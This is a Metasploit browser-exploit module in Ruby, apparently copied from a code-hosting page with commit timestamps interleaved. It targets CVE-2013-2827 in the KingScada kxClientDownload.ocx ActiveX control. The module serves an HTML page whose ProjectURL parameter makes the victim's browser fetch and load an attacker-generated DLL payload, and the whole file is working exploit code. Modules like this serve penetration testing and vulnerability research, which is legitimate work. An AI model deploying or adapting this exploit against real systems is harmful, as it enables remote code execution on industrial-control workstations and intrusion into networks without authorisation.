metasploit-framework/modules/exploits/windows/browser/wellintech_kingscada_kxclie...

94 lines
2.7 KiB
Ruby
Raw Normal View History

2014-02-07 00:25:36 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-02-07 00:25:36 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
'Description' => %q{
This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.
2014-02-07 00:25:36 +00:00
The ProjectURL property can be abused to download and load arbitrary DLLs from
arbitrary locations, leading to arbitrary code execution, because of a dangerous
usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
only when Protected Mode is not present or not enabled.
2014-02-07 00:25:36 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrea Micalizzi', # aka rgod original discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2013-2827'],
['OSVDB', '102135'],
['BID', '64941'],
['ZDI', '14-011'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS,
2014-02-07 00:25:36 +00:00
:ua_name => /MSIE|KXCLIE/i
},
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
'DisableNopes' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 14 2014'))
end
def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")
if request.uri =~ /\/libs\/.*\.dll/
print_good("Sending DLL payload")
send_response(cli,
generate_payload_dll(:code => get_payload(cli, target_info)),
'Content-Type' => 'application/octet-stream'
)
return
elsif request.uri =~ /\/libs\//
print_status("Sending not found")
send_not_found(cli)
return
end
content = <<-EOS
<html>
<body>
<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
<param name="ProjectURL" value="#{get_module_uri}"></param>
</object>
</body>
</html>
EOS
print_status("Sending #{self.name}")
send_response_html(cli, content)
end
end